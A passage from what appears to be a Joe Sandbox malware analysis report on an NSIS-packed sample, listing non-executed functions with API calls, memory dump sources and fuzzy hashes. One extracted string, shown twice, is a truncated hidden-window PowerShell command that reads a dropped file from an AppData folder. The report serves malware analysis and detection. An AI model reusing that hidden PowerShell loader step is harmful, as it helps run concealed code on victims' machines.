                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                                                                        • Instruction ID: 30bcdc9e1ec4e9f5bd758bba81a049f6052f636b6f7eedaabba742a71ce1d9c6
                                                                        • Opcode Fuzzy Hash: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                                                                        • Instruction Fuzzy Hash: 43A0113A008200AFCF028B80EF08C0ABB22ABE0300B22C038A28080030CB3208A0EB08

                                                                        Non-executed Functions

                                                                        Function 00404B08 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B20
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404B2B
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B75
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404B88
                                                                        • SetWindowLongW.USER32(?,000000FC,00405100), ref: 00404BA1
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BB5
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BC7
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404BDD
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BE9
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BFB
                                                                        • DeleteObject.GDI32(00000000), ref: 00404BFE
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C29
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C35
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CCB
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CF6
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D0A
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404D39
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D47
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404D58
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E55
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EBA
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ECF
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF3
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F13
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404F28
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00404F38
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB1
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040505A
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405069
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405089
                                                                        • ShowWindow.USER32(?,00000000), ref: 004050D7
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004050E2
                                                                        • ShowWindow.USER32(00000000), ref: 004050E9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 1638840714-813528018
                                                                        • Opcode ID: 72ff75623ef579166a908c5f7c04ca3ddf3c3186be96de862a414ca8db5381fc
                                                                        • Instruction ID: 0cd49cefa4a501a52bc59e4f925d00b877300575b91fe519bcb2a61a8a5a243c
                                                                        • Opcode Fuzzy Hash: 72ff75623ef579166a908c5f7c04ca3ddf3c3186be96de862a414ca8db5381fc
                                                                        • Instruction Fuzzy Hash: B5026DB0900209AFEB10DF54DD85AAE7BB5FB85314F10813AF614BA2E1DB789D51CF98
                                                                        Function 0040458C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004045DB
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404605
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004046B6
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004046C1
                                                                        • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 004046F3
                                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 004046FF
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404711
                                                                          • Part of subcall function 00405756: GetDlgItemTextW.USER32(?,?,00000400,00404748), ref: 00405769
                                                                          • Part of subcall function 004062C1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406324
                                                                          • Part of subcall function 004062C1: CharNextW.USER32(?,?,?,00000000), ref: 00406333
                                                                          • Part of subcall function 004062C1: CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406338
                                                                          • Part of subcall function 004062C1: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 0040634B
                                                                        • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 004047D4
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047EF
                                                                          • Part of subcall function 00404948: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049E9
                                                                          • Part of subcall function 00404948: wsprintfW.USER32 ref: 004049F2
                                                                          • Part of subcall function 00404948: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404A05
                                                                        Strings
                                                                        • powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk, xrefs: 004045A5
                                                                        • : Completed, xrefs: 004046ED, 004046F2, 004046FD
                                                                        • C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 004046DC
                                                                        • A, xrefs: 004046AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: : Completed$A$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk
                                                                        • API String ID: 2624150263-1924153714
                                                                        • Opcode ID: e354fc6f01a67d9e6d2c19c26d7cfb6d1b338487a667e74d8ebdf199c81fc2f1
                                                                        • Instruction ID: 4e2f864614c1a86ea7b1c44af5ac01a56564cfcb46a86a7d63bcc09a88bdc754
                                                                        • Opcode Fuzzy Hash: e354fc6f01a67d9e6d2c19c26d7cfb6d1b338487a667e74d8ebdf199c81fc2f1
                                                                        • Instruction Fuzzy Hash: D0A19DF1900209ABDB11AFA5CC85AAF77B8EF85314F10843BF611B72D1DB7C89418B69
                                                                        Function 0040581E Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
                                                                        • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040588F
                                                                        • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B8
                                                                        • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C8
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405968
                                                                        • FindClose.KERNEL32(00000000), ref: 00405977
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-1230155968
                                                                        • Opcode ID: 79936e2c09c2467da1847b8fcf84fb4c2ae0a6b28b626d6e6fcc789b16bbbf50
                                                                        • Instruction ID: 5c53005082933f3dff19d1f621f77edce462737186d9f3cfcfb8b04c389e649a
                                                                        • Opcode Fuzzy Hash: 79936e2c09c2467da1847b8fcf84fb4c2ae0a6b28b626d6e6fcc789b16bbbf50
                                                                        • Instruction Fuzzy Hash: 0941E671800A04FACB216B618C89BBF7678EF42729F24813BF801751C1D77C4996DEAE
                                                                        Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 00402154
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede
                                                                        • API String ID: 542301482-246221564
                                                                        • Opcode ID: 779855a2f267a103eb7f53029cbd6d58a7f362876f4ec998b3b23ee8f38541bf
                                                                        • Instruction ID: 8e98f1ea9ac47b8784027b2eb306f9cd2ff55d848736a2d1ce7b03e60076e0bb
                                                                        • Opcode Fuzzy Hash: 779855a2f267a103eb7f53029cbd6d58a7f362876f4ec998b3b23ee8f38541bf
                                                                        • Instruction Fuzzy Hash: 68411A75A00209AFCF00DFA4CD88EAD7BB6FF48314B20456AF515EB2D1DBB99A41CB54
                                                                        Function 0040428E Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040432C
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404340
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040435D
                                                                        • GetSysColor.USER32(?), ref: 0040436E
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040437C
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438A
                                                                        • lstrlenW.KERNEL32(?), ref: 0040438F
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040439C
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B1
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040440A
                                                                        • SendMessageW.USER32(00000000), ref: 00404411
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040443C
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040447F
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 0040448D
                                                                        • SetCursor.USER32(00000000), ref: 00404490
                                                                        • ShellExecuteW.SHELL32(0000070B,open,007A69C0,00000000,00000000,00000001), ref: 004044A5
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004044B1
                                                                        • SetCursor.USER32(00000000), ref: 004044B4
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E3
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                        • String ID: : Completed$N$open
                                                                        • API String ID: 3615053054-3069340868
                                                                        • Opcode ID: bf7b86e320e160068de3af8e5dcc98207056fefab5135ebfd09c3f8c41110aee
                                                                        • Instruction ID: 31243ed57e0a4603bfcb1190bd50a407b821413fbba6bd0e9f8b9eea7b04e413
                                                                        • Opcode Fuzzy Hash: bf7b86e320e160068de3af8e5dcc98207056fefab5135ebfd09c3f8c41110aee
                                                                        • Instruction Fuzzy Hash: 887170B1900209BFDB10DF64DD85A6A7B69FB84354F00843AFB05B66E1CB78AD51CF98
                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 084c01015129f35d060607ba67430d3c2eb20d58b6f60067759f21b3cf07d9ee
                                                                        • Instruction ID: f1444d1149d995cfbeec1118d5879e63c7af2d267088fbf4af288243ceffc5ab
                                                                        • Opcode Fuzzy Hash: 084c01015129f35d060607ba67430d3c2eb20d58b6f60067759f21b3cf07d9ee
                                                                        • Instruction Fuzzy Hash: 70417C71800209AFCF058F95DE459AFBBB9FF45314F04842EF991AA1A0CB78DA54DFA4
                                                                        Function 00405D5C Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(007A55C0,NUL,?,00000000,?,?,00405EEF,?,?), ref: 00405D6B
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EEF,?,?), ref: 00405D8F
                                                                        • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405D98
                                                                          • Part of subcall function 00405B67: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B77
                                                                          • Part of subcall function 00405B67: lstrlenA.KERNEL32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA9
                                                                        • GetShortPathNameW.KERNEL32(007A5DC0,007A5DC0,00000400), ref: 00405DB5
                                                                        • wsprintfA.USER32 ref: 00405DD3
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405E0E
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E1D
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E55
                                                                        • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405EAB
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405EBC
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EC3
                                                                          • Part of subcall function 00405C02: GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C06
                                                                          • Part of subcall function 00405C02: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
